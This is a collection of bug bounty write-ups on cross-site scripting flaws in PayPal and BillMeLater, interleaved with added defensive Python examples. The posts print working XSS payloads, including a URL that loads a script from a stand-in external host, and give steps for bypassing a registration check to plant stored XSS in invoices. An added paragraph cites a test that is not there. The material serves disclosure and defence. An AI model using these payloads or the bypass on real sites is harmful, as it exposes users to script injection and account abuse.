[BugBounty] Paypal XML Upload Cross Site Scripting Vulnerability

Greetings readers, today I want to share with you one of my latest findings on Paypal.com. When creating an invoice, Paypal allows users to upload attachments for the invoice, and one attachment type they allow is an XML file. What the developers may have missed here is that you can actually embed HTML inside an XML file: an xmlns attribute that declares the XHTML namespace (http://www.w3.org/1999/xhtml) makes the browser render those elements as XHTML, script elements included. A file using this would look something like this:

<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>

When I uploaded a file with this content and the extension .xml, the interpreter on Paypal's site executed the payload (in this case the alert(1)). To fulfil the requirements for a bounty you always have to make such a vulnerability exploitable, and therefore a risk for other Paypal users. In this case it was pretty easy: you could either send the link to this file directly (it doesn't matter whether the user is logged in or not), or you could send it with the invoice and wait for the user to click on it.
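As an added example that is not part of the original post and not Paypal's code, here is the defensive side of this finding. The check below parses an uploaded XML file and rejects it when any element, anywhere in the tree, lives in a namespace a browser renders as a live document (XHTML as in the write-up, plus SVG, which browsers treat the same way), and the header set makes the browser download uploads instead of rendering them in the site's origin. The function names, the constructed sample inputs and the defusedxml remark are my assumptions, not anything taken from Paypal's implementation.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Namespaces that make a browser render an XML document as a live page
# (with script execution) instead of a plain XML tree. XHTML is the one
# used in the write-up; SVG is included because browsers treat it the same.
BROWSER_RENDERED_NAMESPACES = {
    "http://www.w3.org/1999/xhtml",
    "http://www.w3.org/2000/svg",
}


def find_browser_rendered_elements(xml_bytes: bytes) -> Optional[List[Tuple[str, str]]]:
    """Return (namespace, local-name) for every element that lives in a
    browser-rendered namespace, anywhere in the tree.

    Returns None when the input is not well-formed XML so the caller can
    fail closed. xml.etree offers no protection against entity-expansion
    attacks; a real upload handler should parse with defusedxml instead
    (assumption: defusedxml.ElementTree.fromstring has the same signature).
    """
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError:
        return None
    hits = []
    for element in root.iter():
        # ElementTree spells namespaced tags as "{uri}local-name"
        if element.tag.startswith("{"):
            uri, _, local_name = element.tag[1:].partition("}")
            if uri in BROWSER_RENDERED_NAMESPACES:
                hits.append((uri, local_name))
    return hits


def is_acceptable_xml_upload(xml_bytes: bytes) -> bool:
    """Accept only well-formed XML with no browser-rendered namespace in it."""
    hits = find_browser_rendered_elements(xml_bytes)
    return hits is not None and len(hits) == 0


def attachment_response_headers(filename: str) -> dict:
    """Headers for serving any user upload: the browser downloads the file
    instead of rendering it in the site's origin, so even an upload that
    slipped past the content check is not rendered as a page of the site.
    """
    # Keep the filename out of header-injection territory: letters, digits, . _ - only
    safe_name = "".join(c for c in filename if c.isalnum() or c in "._-") or "attachment"
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "sandbox",
    }


if __name__ == "__main__":
    # Constructed sample inputs: the file from the write-up and a harmless invoice
    UPLOAD_FROM_POST = (
        b'<html><head></head><body>'
        b'<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>'
        b'</body></html>'
    )
    HARMLESS_INVOICE = b'<invoice><item qty="2">Widget</item></invoice>'
    for name, data in [("post sample", UPLOAD_FROM_POST), ("invoice", HARMLESS_INVOICE)]:
        verdict = "accept" if is_acceptable_xml_upload(data) else "reject"
        print(name, "->", verdict, find_browser_rendered_elements(data))
```

Two layers matter here. The content check catches the file shown above even though its root element is a plain, un-namespaced html tag, because the decision is made per element rather than on the root; and because it is an allow-list on namespaces rather than a block-list on the word script, it also covers event-handler attributes and other XHTML or SVG constructs that execute code. The response headers are the control that holds when the content check is bypassed: a file served with Content-Disposition: attachment is downloaded, not rendered in the site's origin.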

Here is the POC I sent in to the Paypal bug bounty team:

If you have any questions on this particular case, please don't hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com

All the best

Patrik


[BugBounty] Reflected Cross Site Scripting at Paypal.com

Dear followers, I found a reflected Cross Site Scripting issue on the new Paypal Directory service (https://www.paypal.com/directory/merchants), with the following payload:

&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

The vulnerable parameter was the q parameter. I was able to break out of the script context of the page; I think it was because of the &q parameter, but I am not sure, since Paypal fixed this issue too fast for me to analyze it more in depth :/

https://www.paypal.com/directory/merchants?q=&q=509%22%20src=%22http://www.example.com/exploit509.js%20%3C script %3E alert %281%29%3C/ script %3E

Here is the POC I sent in to Paypal:

Hope you enjoyed! If you have any kind of question, please don't hesitate to ask me, either here or via email at patrik.fehrenbach(at)it-securityguard.com

All the best

Patrik


[BugBounty] Reflected Cross Site Scripting BillMeLater

Dear followers,

I recently found a reflected Cross Site Scripting issue on a subdomain of BillMeLater (a Paypal acquisition). It was possible to break out of the style attribute and add malicious JavaScript code to the application.

"--></style></ script >< script > alert ("XSS  ")</ script >

By closing the previous style and script elements it was possible to add a new script element and execute the payload; the complete URL looks like this:

http://wwwb.search.billmelater.com/coupons/store/guess/?u=%27%22–%3E%3C/style%3E%3C/%20script%20%3E%3C%20script%20%3E%20alert%20%28%22XSS%20%20%22%29%3C/%20script%20%3E


This one only worked in Firefox; Chrome and IE restricted the execution with their anti-XSS feature.

The bug was categorized as “Out of Scope” for whatever reason.
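Both reflected findings above, the q parameter on the Paypal Directory and the style attribute on the BillMeLater subdomain, come down to the same root cause: a value from the URL is copied into the page in a context where it can close the surrounding element. As an added example that is not part of the original posts and not Paypal's or BillMeLater's code, here is the server-side shape that prevents it: take exactly one value per query parameter (the Directory URL supplies q twice), then pick the encoder by the context the value lands in, with an allow-list rather than an escaper for style contexts. The function names, the page templates and the constructed inputs are my own assumptions.

```python
import html
import json
import re
from urllib.parse import parse_qs, urlsplit


def read_query_param(url: str, name: str, default: str = "") -> str:
    """Return the single value of a query parameter, refusing repeated ones.

    Repeated parameters (?q=&q=...) are a classic way for two layers of an
    application to disagree about which value they validate and which one
    they reflect; refusing them removes the ambiguity.
    """
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])
    if len(values) > 1:
        raise ValueError(f"parameter {name!r} supplied more than once")
    return values[0] if values else default


def encode_for_html_attribute(value: str) -> str:
    """Use inside a quoted HTML attribute value."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """Use inside an inline <script> block, as a complete JS string literal.

    json.dumps escapes quotes and backslashes but leaves < > & alone, so a
    value containing "</script>" would still terminate the block; escape those too.
    """
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


# Style values are allow-listed rather than escaped: CSS has no safe generic
# escaping for untrusted input, and nothing in this set can close a tag.
_CSS_VALUE = re.compile(r"[A-Za-z0-9#%.-]{1,32}")


def encode_for_css_value(value: str) -> str:
    """Use inside a style attribute or <style> block; rejects anything outside the allow-list."""
    if not _CSS_VALUE.fullmatch(value):
        raise ValueError("value not allowed in a style context")
    return value


def render_search_page(query: str) -> str:
    """Directory-style page: the query is reflected into an attribute and into script."""
    return (
        f'<input type="text" name="q" value="{encode_for_html_attribute(query)}">\n'
        f"<script>var lastQuery = {encode_for_js_string(query)};</script>"
    )


def render_store_page(accent_color: str) -> str:
    """Store-page style: a per-store colour is reflected into a <style> block."""
    return f"<style>.store h1 {{ color: {encode_for_css_value(accent_color)}; }}</style>"


if __name__ == "__main__":
    # Constructed input: the decoded payload from the Directory finding
    print(render_search_page('509" src="http://www.example.com/exploit509.js <script>alert(1)</script>'))
    print(render_store_page("#ff6600"))
```

Run against the decoded Directory payload, the attribute context comes out as &quot; and &lt;script&gt;, and the script context as a JSON string literal whose angle brackets are \u003c and \u003e, so the only script element left on the page is the one the template wrote. The BillMeLater payload never reaches the style block at all: the allow-list refuses it, which is the right outcome for a context where no escaping function would be trustworthy.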

Hope you enjoyed! If you have any questions left, please don't hesitate to contact me at patrik.fehrenbach(at)it-securityguard.com


[BugBounty] Paypal stored XSS + Security bypass

Dear followers,

I recently discovered a stored cross site scripting vulnerability on Paypal's core site. The scenario is a bit weird, but I hope to explain everything as well as possible.

During my testing I often create accounts with malicious JavaScript content as the name, organization, etc. While testing on Paypal I did the same and tried to create an account with the username:

"><img src=x onerror javascript=alert(1337)">.jpg

But when I tried to complete the registration, Paypal's security module showed me an error saying that there was some kind of problem with my request. When I looked at the URL I saw that there was some kind of progress bar:

https://www.paypal.com/webapps/merchantboarding/webflow/unifiedflow?execution=e1s1

The first thing that came to my mind was that it's the same URL you get once you are logged in to a legitimate account, so I tried to erase everything after the /webapps/ part of the URL, and suddenly I was inside my new Paypal account with the malicious JavaScript content. I went to the profile settings page and saw that 3 of my JavaScript snippets were executed. So far so good.

Some of you might know that you need a scenario in which users of Paypal could be exploited in order to receive a bug bounty, so I thought about where I could inject this to reach other Paypal users. A few months ago I had also found a stored cross site scripting issue within an invoice created by Paypal. If you look at the landing page of Paypal you will see that every invoice you receive includes the name of the user that sent it to you. So, my username is malicious JavaScript, and Paypal allows me to send invoices to every single Paypal user just by knowing their e-mail. So I went further, created an invoice, and sent it to my second Paypal account. I logged in to the second one, and the JavaScript prompt appeared on my screen.

To summarize the process:

1. Create an account with the malicious payload

2. At the point where the Paypal system stops you from continuing, erase the URL back to /webapps/ (this bypasses the security restriction)

3. Create an invoice and send it to the victim

4. The victim logs into their account and the payload gets executed
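As an added example that is not part of the original post and not Paypal's code, here is the server-side shape that closes both halves of this chain: the risk verdict from registration is stored with the account and enforced on every request under /webapps/, so erasing the URL back to /webapps/ changes nothing, and the sender name on an invoice is HTML-escaped on output regardless of what registration let through. The allow-list regex standing in for Paypal's security module, the class and function names, the status codes and the sample accounts are my own assumptions.

```python
import html
import re
from dataclasses import dataclass, field
from enum import Enum


class AccountState(Enum):
    BLOCKED = "blocked"   # risk check failed: nothing under /webapps/ is reachable
    ACTIVE = "active"


# Stand-in for the registration risk check (an assumption, not Paypal's rules):
# display names are letters, digits, spaces and a few punctuation marks.
DISPLAY_NAME = re.compile(r"[\w .'\-]{1,60}")


@dataclass
class Account:
    email: str
    display_name: str
    state: AccountState


@dataclass
class Backend:
    accounts: dict = field(default_factory=dict)   # email -> Account
    inboxes: dict = field(default_factory=dict)    # email -> rendered invoice rows

    def register(self, email: str, display_name: str) -> Account:
        """The risk verdict is persisted with the account, not only with the wizard step."""
        passed = DISPLAY_NAME.fullmatch(display_name) is not None
        account = Account(email, display_name, AccountState.ACTIVE if passed else AccountState.BLOCKED)
        self.accounts[email] = account
        return account

    def handle_request(self, email: str, path: str) -> int:
        """Authorization check every request under /webapps/ passes through.

        Which page under /webapps/ is requested does not enter the decision:
        the onboarding wizard and the account home are gated the same way,
        so a blocked account gets 403 for all of them.
        """
        if not path.startswith("/webapps/"):
            return 404
        account = self.accounts.get(email)
        if account is None:
            return 401
        if account.state is not AccountState.ACTIVE:
            return 403
        return 200

    def send_invoice(self, sender_email: str, recipient_email: str, amount: float) -> bool:
        """Sending sits behind the same gate, and the sender name is escaped on output."""
        sender = self.accounts.get(sender_email)
        if sender is None or sender.state is not AccountState.ACTIVE:
            return False
        row = f"<tr><td>{html.escape(sender.display_name)}</td><td>{amount:.2f}</td></tr>"
        self.inboxes.setdefault(recipient_email, []).append(row)
        return True


if __name__ == "__main__":
    backend = Backend()  # constructed sample accounts
    attacker = backend.register("attacker@example.test", '"><img src=x onerror javascript=alert(1337)">.jpg')
    print(attacker.state, backend.handle_request(attacker.email, "/webapps/"))
    shop = backend.register("shop@example.test", "Patrik's Shop")
    backend.send_invoice(shop.email, "customer@example.test", 12.5)
    print(backend.inboxes["customer@example.test"])
```

The two checks are independent on purpose. Step 2 of the chain only works when the "stop" is a property of the wizard page rather than of the account; once the verdict lives on the account record, every handler sees it and the URL is irrelevant. Step 4 only works when the invoice page trusts the stored name; escaping at the point of output keeps even a name that slipped past registration inert, which is why the test below also feeds an un-vetted name through send_invoice.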

I made a small POC video which shows the impact:

I hope you enjoyed 🙂